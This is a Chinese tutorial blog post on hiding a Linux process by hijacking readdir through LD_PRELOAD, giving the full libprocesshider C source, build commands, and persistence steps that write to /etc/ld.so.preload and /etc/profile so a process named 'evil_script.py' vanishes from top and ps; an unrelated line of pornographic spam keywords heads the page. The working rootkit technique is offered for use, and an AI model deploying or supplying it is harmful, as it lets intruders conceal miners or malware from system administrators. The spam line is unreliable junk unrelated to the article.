欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

linux 下隱藏進程的一種方法及遇到的坑

 更新時間:2018年09月07日 10:26:09   作者:mysgk  
這篇文章主要介紹了linux 下隱藏進程的一種方法,主要實現(xiàn)思路就是利用 LD_PRELOAD 來實現(xiàn)系統(tǒng)函數的劫持,具體實現(xiàn)代碼,需要的朋友可以參考下

前言

1.本文所用到的工具在 https://github.com/gianlucaborello/libprocesshider 可以下載

2.思路就是利用 LD_PRELOAD 來實現(xiàn)系統(tǒng)函數的劫持

LD_PRELOAD是什么:

LD_PRELOAD是Linux系統(tǒng)的一個環(huán)境變量,它可以影響程序的運行時的鏈接(Runtime linker),它允許你定義在程序運行前優(yōu)先加載的動態(tài)鏈接庫。這個功能主要就是用來有選擇性的載入不同動態(tài)鏈接庫中的相同函數。通過這個環(huán)境變量,我們可以在主程序和其動態(tài)鏈接庫的中間加載別的動態(tài)鏈接庫,甚至覆蓋正常的函數庫。一方面,我們可以以此功能來使用自己的或是更好的函數(無需別人的源碼),而另一方面,我們也可以以向別人的程序注入程序,從而達到特定的目的。

實現(xiàn)

1.下載程序編譯

bmfxgkpt-yhd:~# git clone https://github.com/gianlucaborello/libprocesshider.git
Cloning into 'libprocesshider'...
remote: Counting objects: 26, done.
remote: Total 26 (delta 0), reused 0 (delta 0), pack-reused 26
Unpacking objects: 100% (26/26), done.
bmfxgkpt-yhd:~# cd libprocesshider/
bmfxgkpt-yhd:~/libprocesshider# make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
bmfxgkpt-yhd:~/libprocesshider#

2.移動文件到/usr/local/lib/目錄下

mv libprocesshider.so /usr/local/lib/

3.把它加載到全局動態(tài)連接局

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

測試

1.我們運行evil_script.py

2.此時發(fā)現(xiàn)在top 與 ps 中都無法找到 evil_script.py

此時我們發(fā)現(xiàn) cpu 100%,但是卻找不到任何占用cpu高的程序

分析

#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "evil_script.py";
/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
  int fd = dirfd(dirp);
  if(fd == -1) {
    return 0;
  }
  char tmp[64];
  snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
  ssize_t ret = readlink(tmp, buf, size);
  if(ret == -1) {
    return 0;
  }
  buf[ret] = 0;
  return 1;
}
/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
  if(strspn(pid, "0123456789") != strlen(pid)) {
    return 0;
  }
  char tmp[256];
  snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
  FILE* f = fopen(tmp, "r");
  if(f == NULL) {
    return 0;
  }
  if(fgets(tmp, sizeof(tmp), f) == NULL) {
    fclose(f);
    return 0;
  }
  fclose(f);
  int unused;
  sscanf(tmp, "%d (%[^)]s", &unused, buf);
  return 1;
}
#define DECLARE_READDIR(dirent, readdir)                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;        \
struct dirent* readdir(DIR *dirp)                    \
{                                    \
  if(original_##readdir == NULL) {                  \
    original_##readdir = dlsym(RTLD_NEXT, "readdir");        \
    if(original_##readdir == NULL)                 \
    {                                \
      fprintf(stderr, "Error in dlsym: %s\n", dlerror());     \
    }                                \
  }                                  \
  struct dirent* dir;                         \
  while(1)                              \
  {                                  \
    dir = original_##readdir(dirp);                 \
    if(dir) {                            \
      char dir_name[256];                     \
      char process_name[256];                   \
      if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&    \
        strcmp(dir_name, "/proc") == 0 &&            \
        get_process_name(dir->d_name, process_name) &&     \
        strcmp(process_name, process_to_filter) == 0) {     \
        continue;                        \
      }                              \
    }                                \
    break;                             \
  }                                  \
  return dir;                             \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

1.程序定義了一個變量 process_to_filter 來控制不顯示哪個進程名

2.重寫readdir,

strcmp(process_name, process_to_filter) == 0)

當發(fā)現(xiàn)當前進程名稱與 process_to_filter 相同時,繼續(xù)循環(huán).

遇到的坑

1.某些Linux中這個程序編譯通不過

解決方法

刪除最后兩行中的一行

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);

2.某些Linux中使用

shell echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
并不會生效
 此時我們需要配置環(huán)境變量
shell bmfxgkpt-yhd:~# vi /etc/profile
增加一行
shell export LD_PRELOAD=/usr/local/lib/libprocesshider.so

總結

以上所述是小編給大家介紹的linux 下隱藏進程的一種方法及遇到的坑,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!

您可能感興趣的文章:

相關文章

  • 使用apachetop實時監(jiān)控日志、動態(tài)分析服務器運行狀態(tài)

    使用apachetop實時監(jiān)控日志、動態(tài)分析服務器運行狀態(tài)

    這篇文章主要介紹了使用apachetop實時監(jiān)控日志、動態(tài)分析服務器運行狀態(tài),通過apachetop這個工具可以動態(tài)的查看apache的日志文件,還可以直觀的看到訪問的每個地址的請求數、速度及流量等信息,需要的朋友可以參考下
    2014-06-06
  • 詳解centos7中配置keepalived日志為別的路徑

    詳解centos7中配置keepalived日志為別的路徑

    這篇文章主要介紹了centos7中配置keepalived日志為別的路徑,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個參考。一起跟隨小編過來看看吧
    2018-10-10
  • 輕松上手Linux,掌握這些基礎指令就夠了

    輕松上手Linux,掌握這些基礎指令就夠了

    想要成為Linux高手嗎?掌握常用指令是關鍵!本指南將為你介紹最實用的Linux指令,讓你輕松管理你的系統(tǒng),從文件操作到系統(tǒng)監(jiān)控,我們將一步步引導你成為Linux的行家里手,快來學習這些必備技能,讓你的工作效率飛速提升!
    2024-03-03
  • 【Linux】Linux中常用操作命令總結

    【Linux】Linux中常用操作命令總結

    這篇文章主要介紹了【Linux】Linux中常用操作命令總結,Linux,免費開源,多用戶多任務系統(tǒng)。本文總結了一些實用常用命令,需要的朋友可以參考下。
    2016-11-11
  • centos 7.5 部署varnish緩存服務器功能

    centos 7.5 部署varnish緩存服務器功能

    這篇文章主要介紹了centos 7.5 部署varnish緩存服務器功能,文中給大家介紹了varnish的簡介和主要特征,需要的朋友可以參考下
    2019-10-10
  • 如何利用Bash腳本監(jiān)控Linux的內存使用情況

    如何利用Bash腳本監(jiān)控Linux的內存使用情況

    這篇文章主要給大家介紹了關于如何利用Bash腳本監(jiān)控Linux的內存使用情況的相關資料,文中通過示例代碼介紹的非常詳細,對大家學習或者使用linux具有一定的參考學習價值,需要的朋友們下面來一起學習學習吧
    2019-06-06
  • kali linux 系統(tǒng)版本的查看方法

    kali linux 系統(tǒng)版本的查看方法

    今天小編就為大家分享一篇kali linux 系統(tǒng)版本的查看方法,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧
    2019-07-07
  • apache下支持asp.net的實現(xiàn)方法

    apache下支持asp.net的實現(xiàn)方法

    讓apache支持asp.net的設置步驟。
    2009-12-12
  • linux殺進程的多種方法

    linux殺進程的多種方法

    這篇文章主要介紹了linux殺進程的多種方法,需要的朋友可以參考下
    2014-03-03
  • centos下安裝redis服務詳細節(jié)介紹

    centos下安裝redis服務詳細節(jié)介紹

    這篇文章主要介紹了 centos安裝redis 服務的資料,這里對安裝步驟進行了詳細的介紹,具有參考價值,有需要的小伙伴可以參考下
    2016-11-11

最新評論